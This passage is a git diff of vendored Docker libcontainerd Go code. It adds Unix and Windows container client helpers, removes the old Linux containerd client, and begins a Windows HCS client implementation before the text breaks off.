+func hostIDFromMap(id uint32, mp []specs.LinuxIDMapping) int {
+	for _, m := range mp {
+		if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 {
+			return int(m.HostID + id - m.ContainerID)
+		}
+	}
+	return 0
+}
+
+func getSpecUser(ociSpec *specs.Spec) (int, int) {
+	var (
+		uid int
+		gid int
+	)
+
+	for _, ns := range ociSpec.Linux.Namespaces {
+		if ns.Type == specs.UserNamespace {
+			uid = hostIDFromMap(0, ociSpec.Linux.UIDMappings)
+			gid = hostIDFromMap(0, ociSpec.Linux.GIDMappings)
+			break
+		}
+	}
+
+	return uid, gid
+}
+
+func prepareBundleDir(bundleDir string, ociSpec *specs.Spec) (string, error) {
+	uid, gid := getSpecUser(ociSpec)
+	if uid == 0 && gid == 0 {
+		return bundleDir, idtools.MkdirAllAndChownNew(bundleDir, 0755, idtools.IDPair{UID: 0, GID: 0})
+	}
+
+	p := string(filepath.Separator)
+	components := strings.Split(bundleDir, string(filepath.Separator))
+	for _, d := range components[1:] {
+		p = filepath.Join(p, d)
+		fi, err := os.Stat(p)
+		if err != nil && !os.IsNotExist(err) {
+			return "", err
+		}
+		if os.IsNotExist(err) || fi.Mode()&1 == 0 {
+			p = fmt.Sprintf("%s.%d.%d", p, uid, gid)
+			if err := idtools.MkdirAndChown(p, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil && !os.IsExist(err) {
+				return "", err
+			}
+		}
+	}
+
+	return p, nil
+}
+
+func newFIFOSet(bundleDir, processID string, withStdin, withTerminal bool) *cio.FIFOSet {
+	config := cio.Config{
+		Terminal: withTerminal,
+		Stdout:   filepath.Join(bundleDir, processID+"-stdout"),
+	}
+	paths := []string{config.Stdout}
+
+	if withStdin {
+		config.Stdin = filepath.Join(bundleDir, processID+"-stdin")
+		paths = append(paths, config.Stdin)
+	}
+	if !withTerminal {
+		config.Stderr = filepath.Join(bundleDir, processID+"-stderr")
+		paths = append(paths, config.Stderr)
+	}
+	closer := func() error {
+		for _, path := range paths {
+			if err := os.RemoveAll(path); err != nil {
+				logrus.Warnf("libcontainerd: failed to remove fifo %v: %v", path, err)
+			}
+		}
+		return nil
+	}
+
+	return cio.NewFIFOSet(config, closer)
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go
new file mode 100644
index 0000000000..4aba33e18c
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go
@@ -0,0 +1,55 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"fmt"
+	"path/filepath"
+
+	"github.com/containerd/containerd/cio"
+	"github.com/containerd/containerd/windows/hcsshimtypes"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+)
+
+func summaryFromInterface(i interface{}) (*Summary, error) {
+	switch pd := i.(type) {
+	case *hcsshimtypes.ProcessDetails:
+		return &Summary{
+			CreateTimestamp:              pd.CreatedAt,
+			ImageName:                    pd.ImageName,
+			KernelTime100ns:              pd.KernelTime_100Ns,
+			MemoryCommitBytes:            pd.MemoryCommitBytes,
+			MemoryWorkingSetPrivateBytes: pd.MemoryWorkingSetPrivateBytes,
+			MemoryWorkingSetSharedBytes:  pd.MemoryWorkingSetSharedBytes,
+			ProcessId:                    pd.ProcessID,
+			UserTime100ns:                pd.UserTime_100Ns,
+		}, nil
+	default:
+		return nil, errors.Errorf("Unknown process details type %T", pd)
+	}
+}
+
+func prepareBundleDir(bundleDir string, ociSpec *specs.Spec) (string, error) {
+	return bundleDir, nil
+}
+
+func pipeName(containerID, processID, name string) string {
+	return fmt.Sprintf(`\\.\pipe\containerd-%s-%s-%s`, containerID, processID, name)
+}
+
+func newFIFOSet(bundleDir, processID string, withStdin, withTerminal bool) *cio.FIFOSet {
+	containerID := filepath.Base(bundleDir)
+	config := cio.Config{
+		Terminal: withTerminal,
+		Stdout:   pipeName(containerID, processID, "stdout"),
+	}
+
+	if withStdin {
+		config.Stdin = pipeName(containerID, processID, "stdin")
+	}
+
+	if !config.Terminal {
+		config.Stderr = pipeName(containerID, processID, "stderr")
+	}
+
+	return cio.NewFIFOSet(config, nil)
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_linux.go
deleted file mode 100644
index 190f981865..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/client_linux.go
+++ /dev/null
@@ -1,605 +0,0 @@
-package libcontainerd
-
-import (
-	"fmt"
-	"os"
-	"strings"
-	"sync"
-	"syscall"
-	"time"
-
-	"github.com/Sirupsen/logrus"
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/mount"
-	"github.com/golang/protobuf/ptypes"
-	"github.com/golang/protobuf/ptypes/timestamp"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
-	"golang.org/x/net/context"
-)
-
-type client struct {
-	clientCommon
-
-	// Platform specific properties below here.
-	remote        *remote
-	q             queue
-	exitNotifiers map[string]*exitNotifier
-	liveRestore   bool
-}
-
-// GetServerVersion returns the connected server version information
-func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) {
-	resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{})
-	if err != nil {
-		return nil, err
-	}
-
-	sv := &ServerVersion{
-		GetServerVersionResponse: *resp,
-	}
-
-	return sv, nil
-}
-
-// AddProcess is the handler for adding a process to an already running
-// container. It's called through docker exec. It returns the system pid of the
-// exec'd process.
-func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (pid int, err error) {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return -1, err
-	}
-
-	spec, err := container.spec()
-	if err != nil {
-		return -1, err
-	}
-	sp := spec.Process
-	sp.Args = specp.Args
-	sp.Terminal = specp.Terminal
-	if len(specp.Env) > 0 {
-		sp.Env = specp.Env
-	}
-	if specp.Cwd != nil {
-		sp.Cwd = *specp.Cwd
-	}
-	if specp.User != nil {
-		sp.User = specs.User{
-			UID:            specp.User.UID,
-			GID:            specp.User.GID,
-			AdditionalGids: specp.User.AdditionalGids,
-		}
-	}
-	if specp.Capabilities != nil {
-		sp.Capabilities = specp.Capabilities
-	}
-
-	p := container.newProcess(processFriendlyName)
-
-	r := &containerd.AddProcessRequest{
-		Args:     sp.Args,
-		Cwd:      sp.Cwd,
-		Terminal: sp.Terminal,
-		Id:       containerID,
-		Env:      sp.Env,
-		User: &containerd.User{
-			Uid:            sp.User.UID,
-			Gid:            sp.User.GID,
-			AdditionalGids: sp.User.AdditionalGids,
-		},
-		Pid:             processFriendlyName,
-		Stdin:           p.fifo(syscall.Stdin),
-		Stdout:          p.fifo(syscall.Stdout),
-		Stderr:          p.fifo(syscall.Stderr),
-		Capabilities:    sp.Capabilities,
-		ApparmorProfile: sp.ApparmorProfile,
-		SelinuxLabel:    sp.SelinuxLabel,
-		NoNewPrivileges: sp.NoNewPrivileges,
-		Rlimits:         convertRlimits(sp.Rlimits),
-	}
-
-	fifoCtx, cancel := context.WithCancel(context.Background())
-	defer func() {
-		if err != nil {
-			cancel()
-		}
-	}()
-
-	iopipe, err := p.openFifos(fifoCtx, sp.Terminal)
-	if err != nil {
-		return -1, err
-	}
-
-	resp, err := clnt.remote.apiClient.AddProcess(ctx, r)
-	if err != nil {
-		p.closeFifos(iopipe)
-		return -1, err
-	}
-
-	var stdinOnce sync.Once
-	stdin := iopipe.Stdin
-	iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error {
-		var err error
-		stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed
-			err = stdin.Close()
-			if err2 := p.sendCloseStdin(); err == nil {
-				err = err2
-			}
-		})
-		return err
-	})
-
-	container.processes[processFriendlyName] = p
-
-	if err := attachStdio(*iopipe); err != nil {
-		p.closeFifos(iopipe)
-		return -1, err
-	}
-
-	return int(resp.SystemPid), nil
-}
-
-func (clnt *client) SignalProcess(containerID string, pid string, sig int) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	_, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{
-		Id:     containerID,
-		Pid:    pid,
-		Signal: uint32(sig),
-	})
-	return err
-}
-
-func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	if _, err := clnt.getContainer(containerID); err != nil {
-		return err
-	}
-	_, err := clnt.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{
-		Id:     containerID,
-		Pid:    processFriendlyName,
-		Width:  uint32(width),
-		Height: uint32(height),
-	})
-	return err
-}
-
-func (clnt *client) Pause(containerID string) error {
-	return clnt.setState(containerID, StatePause)
-}
-
-func (clnt *client) setState(containerID, state string) error {
-	clnt.lock(containerID)
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		clnt.unlock(containerID)
-		return err
-	}
-	if container.systemPid == 0 {
-		clnt.unlock(containerID)
-		return fmt.Errorf("No active process for container %s", containerID)
-	}
-	st := "running"
-	if state == StatePause {
-		st = "paused"
-	}
-	chstate := make(chan struct{})
-	_, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{
-		Id:     containerID,
-		Pid:    InitFriendlyName,
-		Status: st,
-	})
-	if err != nil {
-		clnt.unlock(containerID)
-		return err
-	}
-	container.pauseMonitor.append(state, chstate)
-	clnt.unlock(containerID)
-	<-chstate
-	return nil
-}
-
-func (clnt *client) Resume(containerID string) error {
-	return clnt.setState(containerID, StateResume)
-}
-
-func (clnt *client) Stats(containerID string) (*Stats, error) {
-	resp, err := clnt.remote.apiClient.Stats(context.Background(), &containerd.StatsRequest{containerID})
-	if err != nil {
-		return nil, err
-	}
-	return (*Stats)(resp), nil
-}
-
-// Take care of the old 1.11.0 behavior in case the version upgrade
-// happened without a clean daemon shutdown
-func (clnt *client) cleanupOldRootfs(containerID string) {
-	// Unmount and delete the bundle folder
-	if mts, err := mount.GetMounts(); err == nil {
-		for _, mts := range mts {
-			if strings.HasSuffix(mts.Mountpoint, containerID+"/rootfs") {
-				if err := syscall.Unmount(mts.Mountpoint, syscall.MNT_DETACH); err == nil {
-					os.RemoveAll(strings.TrimSuffix(mts.Mountpoint, "/rootfs"))
-				}
-				break
-			}
-		}
-	}
-}
-
-func (clnt *client) setExited(containerID string, exitCode uint32) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-
-	err := clnt.backend.StateChanged(containerID, StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State:    StateExit,
-			ExitCode: exitCode,
-		}})
-
-	clnt.cleanupOldRootfs(containerID)
-
-	return err
-}
-
-func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) {
-	cont, err := clnt.getContainerdContainer(containerID)
-	if err != nil {
-		return nil, err
-	}
-	pids := make([]int, len(cont.Pids))
-	for i, p := range cont.Pids {
-		pids[i] = int(p)
-	}
-	return pids, nil
-}
-
-// Summary returns a summary of the processes running in a container.
-// This is a no-op on Linux.
-func (clnt *client) Summary(containerID string) ([]Summary, error) {
-	return nil, nil
-}
-
-func (clnt *client) getContainerdContainer(containerID string) (*containerd.Container, error) {
-	resp, err := clnt.remote.apiClient.State(context.Background(), &containerd.StateRequest{Id: containerID})
-	if err != nil {
-		return nil, err
-	}
-	for _, cont := range resp.Containers {
-		if cont.Id == containerID {
-			return cont, nil
-		}
-	}
-	return nil, fmt.Errorf("invalid state response")
-}
-
-func (clnt *client) UpdateResources(containerID string, resources Resources) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return err
-	}
-	if container.systemPid == 0 {
-		return fmt.Errorf("No active process for container %s", containerID)
-	}
-	_, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{
-		Id:        containerID,
-		Pid:       InitFriendlyName,
-		Resources: (*containerd.UpdateResource)(&resources),
-	})
-	if err != nil {
-		return err
-	}
-	return nil
-}
-
-func (clnt *client) getExitNotifier(containerID string) *exitNotifier {
-	clnt.mapMutex.RLock()
-	defer clnt.mapMutex.RUnlock()
-	return clnt.exitNotifiers[containerID]
-}
-
-func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier {
-	clnt.mapMutex.Lock()
-	w, ok := clnt.exitNotifiers[containerID]
-	defer clnt.mapMutex.Unlock()
-	if !ok {
-		w = &exitNotifier{c: make(chan struct{}), client: clnt}
-		clnt.exitNotifiers[containerID] = w
-	}
-	return w
-}
-
-func (clnt *client) restore(cont *containerd.Container, lastEvent *containerd.Event, attachStdio StdioCallback, options ...CreateOption) (err error) {
-	clnt.lock(cont.Id)
-	defer clnt.unlock(cont.Id)
-
-	logrus.Debugf("libcontainerd: restore container %s state %s", cont.Id, cont.Status)
-
-	containerID := cont.Id
-	if _, err := clnt.getContainer(containerID); err == nil {
-		return fmt.Errorf("container %s is already active", containerID)
-	}
-
-	defer func() {
-		if err != nil {
-			clnt.deleteContainer(cont.Id)
-		}
-	}()
-
-	container := clnt.newContainer(cont.BundlePath, options...)
-	container.systemPid = systemPid(cont)
-
-	var terminal bool
-	for _, p := range cont.Processes {
-		if p.Pid == InitFriendlyName {
-			terminal = p.Terminal
-		}
-	}
-
-	fifoCtx, cancel := context.WithCancel(context.Background())
-	defer func() {
-		if err != nil {
-			cancel()
-		}
-	}()
-
-	iopipe, err := container.openFifos(fifoCtx, terminal)
-	if err != nil {
-		return err
-	}
-	var stdinOnce sync.Once
-	stdin := iopipe.Stdin
-	iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error {
-		var err error
-		stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed
-			err = stdin.Close()
-		})
-		return err
-	})
-
-	if err := attachStdio(*iopipe); err != nil {
-		container.closeFifos(iopipe)
-		return err
-	}
-
-	clnt.appendContainer(container)
-
-	err = clnt.backend.StateChanged(containerID, StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State: StateRestore,
-			Pid:   container.systemPid,
-		}})
-
-	if err != nil {
-		container.closeFifos(iopipe)
-		return err
-	}
-
-	if lastEvent != nil {
-		// This should only be a pause or resume event
-		if lastEvent.Type == StatePause || lastEvent.Type == StateResume {
-			return clnt.backend.StateChanged(containerID, StateInfo{
-				CommonStateInfo: CommonStateInfo{
-					State: lastEvent.Type,
-					Pid:   container.systemPid,
-				}})
-		}
-
-		logrus.Warnf("libcontainerd: unexpected backlog event: %#v", lastEvent)
-	}
-
-	return nil
-}
-
-func (clnt *client) getContainerLastEventSinceTime(id string, tsp *timestamp.Timestamp) (*containerd.Event, error) {
-	er := &containerd.EventsRequest{
-		Timestamp:  tsp,
-		StoredOnly: true,
-		Id:         id,
-	}
-	events, err := clnt.remote.apiClient.Events(context.Background(), er)
-	if err != nil {
-		logrus.Errorf("libcontainerd: failed to get container events stream for %s: %q", er.Id, err)
-		return nil, err
-	}
-
-	var ev *containerd.Event
-	for {
-		e, err := events.Recv()
-		if err != nil {
-			if err.Error() == "EOF" {
-				break
-			}
-			logrus.Errorf("libcontainerd: failed to get container event for %s: %q", id, err)
-			return nil, err
-		}
-		ev = e
-		logrus.Debugf("libcontainerd: received past event %#v", ev)
-	}
-
-	return ev, nil
-}
-
-func (clnt *client) getContainerLastEvent(id string) (*containerd.Event, error) {
-	ev, err := clnt.getContainerLastEventSinceTime(id, clnt.remote.restoreFromTimestamp)
-	if err == nil && ev == nil {
-		// If ev is nil and the container is running in containerd,
-		// we already consumed all the event of the
-		// container, included the "exit" one.
-		// Thus, we request all events containerd has in memory for
-		// this container in order to get the last one (which should
-		// be an exit event)
-		logrus.Warnf("libcontainerd: client is out of sync, restore was called on a fully synced container (%s).", id)
-		// Request all events since beginning of time
-		t := time.Unix(0, 0)
-		tsp, err := ptypes.TimestampProto(t)
-		if err != nil {
-			logrus.Errorf("libcontainerd: getLastEventSinceTime() failed to convert timestamp: %q", err)
-			return nil, err
-		}
-
-		return clnt.getContainerLastEventSinceTime(id, tsp)
-	}
-
-	return ev, err
-}
-
-func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error {
-	// Synchronize with live events
-	clnt.remote.Lock()
-	defer clnt.remote.Unlock()
-	// Check that containerd still knows this container.
-	//
-	// In the unlikely event that Restore for this container process
-	// the its past event before the main loop, the event will be
-	// processed twice. However, this is not an issue as all those
-	// events will do is change the state of the container to be
-	// exactly the same.
-	cont, err := clnt.getContainerdContainer(containerID)
-	// Get its last event
-	ev, eerr := clnt.getContainerLastEvent(containerID)
-	if err != nil || cont.Status == "Stopped" {
-		if err != nil {
-			logrus.Warnf("libcontainerd: failed to retrieve container %s state: %v", containerID, err)
-		}
-		if ev != nil && (ev.Pid != InitFriendlyName || ev.Type != StateExit) {
-			// Wait a while for the exit event
-			timeout := time.NewTimer(10 * time.Second)
-			tick := time.NewTicker(100 * time.Millisecond)
-		stop:
-			for {
-				select {
-				case <-timeout.C:
-					break stop
-				case <-tick.C:
-					ev, eerr = clnt.getContainerLastEvent(containerID)
-					if eerr != nil {
-						break stop
-					}
-					if ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit {
-						break stop
-					}
-				}
-			}
-			timeout.Stop()
-			tick.Stop()
-		}
-
-		// get the exit status for this container, if we don't have
-		// one, indicate an error
-		ec := uint32(255)
-		if eerr == nil && ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit {
-			ec = ev.Status
-		}
-		clnt.setExited(containerID, ec)
-
-		return nil
-	}
-
-	// container is still alive
-	if clnt.liveRestore {
-		if err := clnt.restore(cont, ev, attachStdio, options...); err != nil {
-			logrus.Errorf("libcontainerd: error restoring %s: %v", containerID, err)
-		}
-		return nil
-	}
-
-	// Kill the container if liveRestore == false
-	w := clnt.getOrCreateExitNotifier(containerID)
-	clnt.lock(cont.Id)
-	container := clnt.newContainer(cont.BundlePath)
-	container.systemPid = systemPid(cont)
-	clnt.appendContainer(container)
-	clnt.unlock(cont.Id)
-
-	container.discardFifos()
-
-	if err := clnt.Signal(containerID, int(syscall.SIGTERM)); err != nil {
-		logrus.Errorf("libcontainerd: error sending sigterm to %v: %v", containerID, err)
-	}
-	// Let the main loop handle the exit event
-	clnt.remote.Unlock()
-	select {
-	case <-time.After(10 * time.Second):
-		if err := clnt.Signal(containerID, int(syscall.SIGKILL)); err != nil {
-			logrus.Errorf("libcontainerd: error sending sigkill to %v: %v", containerID, err)
-		}
-		select {
-		case <-time.After(2 * time.Second):
-		case <-w.wait():
-			// relock because of the defer
-			clnt.remote.Lock()
-			return nil
-		}
-	case <-w.wait():
-		// relock because of the defer
-		clnt.remote.Lock()
-		return nil
-	}
-	// relock because of the defer
-	clnt.remote.Lock()
-
-	clnt.deleteContainer(containerID)
-
-	return clnt.setExited(containerID, uint32(255))
-}
-
-func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	if _, err := clnt.getContainer(containerID); err != nil {
-		return err
-	}
-
-	_, err := clnt.remote.apiClient.CreateCheckpoint(context.Background(), &containerd.CreateCheckpointRequest{
-		Id: containerID,
-		Checkpoint: &containerd.Checkpoint{
-			Name:        checkpointID,
-			Exit:        exit,
-			Tcp:         true,
-			UnixSockets: true,
-			Shell:       false,
-			EmptyNS:     []string{"network"},
-		},
-		CheckpointDir: checkpointDir,
-	})
-	return err
-}
-
-func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	if _, err := clnt.getContainer(containerID); err != nil {
-		return err
-	}
-
-	_, err := clnt.remote.apiClient.DeleteCheckpoint(context.Background(), &containerd.DeleteCheckpointRequest{
-		Id:            containerID,
-		Name:          checkpointID,
-		CheckpointDir: checkpointDir,
-	})
-	return err
-}
-
-func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	if _, err := clnt.getContainer(containerID); err != nil {
-		return nil, err
-	}
-
-	resp, err := clnt.remote.apiClient.ListCheckpoint(context.Background(), &containerd.ListCheckpointRequest{
-		Id:            containerID,
-		CheckpointDir: checkpointDir,
-	})
-	if err != nil {
-		return nil, err
-	}
-	return (*Checkpoints)(resp), nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go
new file mode 100644
index 0000000000..6e3454e514
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go
@@ -0,0 +1,1319 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Microsoft/hcsshim"
+	opengcs "github.com/Microsoft/opengcs/client"
+	"github.com/containerd/containerd"
+	"github.com/containerd/containerd/cio"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/pkg/system"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/windows"
+)
+
+const InitProcessName = "init"
+
+type process struct {
+	id         string
+	pid        int
+	hcsProcess hcsshim.Process
+}
+
+type container struct {
+	sync.Mutex
+
+	// The ociSpec is required, as client.Create() needs a spec, but can
+	// be called from the RestartManager context which does not otherwise
+	// have access to the Spec
+	ociSpec *specs.Spec
+
+	isWindows           bool
+	manualStopRequested bool
+	hcsContainer        hcsshim.Container
+
+	id            string
+	status        Status
+	exitedAt      time.Time
+	exitCode      uint32
+	waitCh        chan struct{}
+	init          *process
+	execs         map[string]*process
+	updatePending bool
+}
+
+// Win32 error codes that are used for various workarounds
+// These really should be ALL_CAPS to match golangs syscall library and standard
+// Win32 error conventions, but golint insists on CamelCase.
+const (
+	CoEClassstring     = syscall.Errno(0x800401F3) // Invalid class string
+	ErrorNoNetwork     = syscall.Errno(1222)       // The network is not present or not started
+	ErrorBadPathname   = syscall.Errno(161)        // The specified path is invalid
+	ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object
+)
+
+// defaultOwner is a tag passed to HCS to allow it to differentiate between
+// container creator management stacks. We hard code "docker" in the case
+// of docker.
+const defaultOwner = "docker"
+
+func (c *client) Version(ctx context.Context) (containerd.Version, error) {
+	return containerd.Version{}, errors.New("not implemented on Windows")
+}
+
+// Create is the entrypoint to create a container from a spec.
+// Table below shows the fields required for HCS JSON calling parameters,
+// where if not populated, is omitted.
+// +-----------------+--------------------------------------------+---------------------------------------------------+
+// |                 | Isolation=Process                          | Isolation=Hyper-V                                 |
+// +-----------------+--------------------------------------------+---------------------------------------------------+
+// | VolumePath      | \\?\\Volume{GUIDa}                         |                                                   |
+// | LayerFolderPath | %root%\windowsfilter\containerID           |                                                   |
+// | Layers[]        | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID        |
+// | HvRuntime       |                                            | ImagePath=%root%\BaseLayerID\UtilityVM            |
+// +-----------------+--------------------------------------------+---------------------------------------------------+
+//
+// Isolation=Process example:
+//
+// {
+//	"SystemType": "Container",
+//	"Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776",
+//	"Owner": "docker",
+//	"VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}",
+//	"IgnoreFlushesDuringBoot": true,
+//	"LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776",
+//	"Layers": [{
+//		"ID": "18955d65-d45a-557b-bf1c-49d6dfefc526",
+//		"Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c"
+//	}],
+//	"HostName": "5e0055c814a6",
+//	"MappedDirectories": [],
+//	"HvPartition": false,
+//	"EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"],
+//}
+//
+// Isolation=Hyper-V example:
+//
+//{
+//	"SystemType": "Container",
+//	"Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d",
+//	"Owner": "docker",
+//	"IgnoreFlushesDuringBoot": true,
+//	"Layers": [{
+//		"ID": "18955d65-d45a-557b-bf1c-49d6dfefc526",
+//		"Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c"
+//	}],
+//	"HostName": "475c2c58933b",
+//	"MappedDirectories": [],
+//	"HvPartition": true,
+//	"EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"],
+//	"DNSSearchList": "a.com,b.com,c.com",
+//	"HvRuntime": {
+//		"ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM"
+//	},
+//}
+func (c *client) Create(_ context.Context, id string, spec *specs.Spec, runtimeOptions interface{}) error {
+	if ctr := c.getContainer(id); ctr != nil {
+		return errors.WithStack(newConflictError("id already in use"))
+	}
+
+	// spec.Linux must be nil for Windows containers, but spec.Windows
+	// will be filled in regardless of container platform.  This is a
+	// temporary workaround due to LCOW requiring layer folder paths,
+	// which are stored under spec.Windows.
+	//
+	// TODO: @darrenstahlmsft fix this once the OCI spec is updated to
+	// support layer folder paths for LCOW
+	if spec.Linux == nil {
+		return c.createWindows(id, spec, runtimeOptions)
+	}
+	return c.createLinux(id, spec, runtimeOptions)
+}
+
+func (c *client) createWindows(id string, spec *specs.Spec, runtimeOptions interface{}) error {
+	logger := c.logger.WithField("container", id)
+	configuration := &hcsshim.ContainerConfig{
+		SystemType: "Container",
+		Name:       id,
+		Owner:      defaultOwner,
+		IgnoreFlushesDuringBoot: spec.Windows.IgnoreFlushesDuringBoot,
+		HostName:                spec.Hostname,
+		HvPartition:             false,
+	}
+
+	if spec.Windows.Resources != nil {
+		if spec.Windows.Resources.CPU != nil {
+			if spec.Windows.Resources.CPU.Count != nil {
+				// This check is being done here rather than in adaptContainerSettings
+				// because we don't want to update the HostConfig in case this container
+				// is moved to a host with more CPUs than this one.
+				cpuCount := *spec.Windows.Resources.CPU.Count
+				hostCPUCount := uint64(sysinfo.NumCPU())
+				if cpuCount > hostCPUCount {
+					c.logger.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount)
+					cpuCount = hostCPUCount
+				}
+				configuration.ProcessorCount = uint32(cpuCount)
+			}
+			if spec.Windows.Resources.CPU.Shares != nil {
+				configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares)
+			}
+			if spec.Windows.Resources.CPU.Maximum != nil {
+				configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Maximum)
+			}
+		}
+		if spec.Windows.Resources.Memory != nil {
+			if spec.Windows.Resources.Memory.Limit != nil {
+				configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024
+			}
+		}
+		if spec.Windows.Resources.Storage != nil {
+			if spec.Windows.Resources.Storage.Bps != nil {
+				configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps
+			}
+			if spec.Windows.Resources.Storage.Iops != nil {
+				configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops
+			}
+		}
+	}
+
+	if spec.Windows.HyperV != nil {
+		configuration.HvPartition = true
+	}
+
+	if spec.Windows.Network != nil {
+		configuration.EndpointList = spec.Windows.Network.EndpointList
+		configuration.AllowUnqualifiedDNSQuery = spec.Windows.Network.AllowUnqualifiedDNSQuery
+		if spec.Windows.Network.DNSSearchList != nil {
+			configuration.DNSSearchList = strings.Join(spec.Windows.Network.DNSSearchList, ",")
+		}
+		configuration.NetworkSharedContainerName = spec.Windows.Network.NetworkSharedContainerName
+	}
+
+	if cs, ok := spec.Windows.CredentialSpec.(string); ok {
+		configuration.Credentials = cs
+	}
+
+	// We must have least two layers in the spec, the bottom one being a
+	// base image, the top one being the RW layer.
+	if spec.Windows.LayerFolders == nil || len(spec.Windows.LayerFolders) < 2 {
+		return fmt.Errorf("OCI spec is invalid - at least two LayerFolders must be supplied to the runtime")
+	}
+
+	// Strip off the top-most layer as that's passed in separately to HCS
+	configuration.LayerFolderPath = spec.Windows.LayerFolders[len(spec.Windows.LayerFolders)-1]
+	layerFolders := spec.Windows.LayerFolders[:len(spec.Windows.LayerFolders)-1]
+
+	if configuration.HvPartition {
+		// We don't currently support setting the utility VM image explicitly.
+		// TODO @swernli/jhowardmsft circa RS5, this may be re-locatable.
+		if spec.Windows.HyperV.UtilityVMPath != "" {
+			return errors.New("runtime does not support an explicit utility VM path for Hyper-V containers")
+		}
+
+		// Find the upper-most utility VM image.
+		var uvmImagePath string
+		for _, path := range layerFolders {
+			fullPath := filepath.Join(path, "UtilityVM")
+			_, err := os.Stat(fullPath)
+			if err == nil {
+				uvmImagePath = fullPath
+				break
+			}
+			if !os.IsNotExist(err) {
+				return err
+			}
+		}
+		if uvmImagePath == "" {
+			return errors.New("utility VM image could not be found")
+		}
+		configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath}
+
+		if spec.Root.Path != "" {
